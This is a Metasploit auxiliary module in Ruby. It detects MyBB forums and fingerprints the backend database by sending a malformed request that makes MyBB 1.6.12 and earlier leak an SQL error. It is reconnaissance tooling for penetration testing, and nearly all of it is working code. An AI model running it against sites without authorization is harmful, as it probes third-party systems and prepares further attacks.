## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MyBB Database Fingerprint', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to force an error and fingerprint the backend database used by MyBB on version 1.6.12 and prior. }, 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( [ OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) ], self.class) end def check begin uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'intcheck' => 1 } }) if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version php_version = "#{php_version}" else php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server web_server = "#{web_server}" else web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end rescue return Exploit::CheckCode::Unknown end end def run print_status("#{peer} - Checking MyBB...") unless check == Exploit::CheckCode::Detected print_error("#{peer} - MyBB not found") return end print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { 'letter' => -1 } }) if response.nil? print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("#{peer} - Running SQLite Database") else print_status("#{peer} - Running MySQL or unknown database") end end end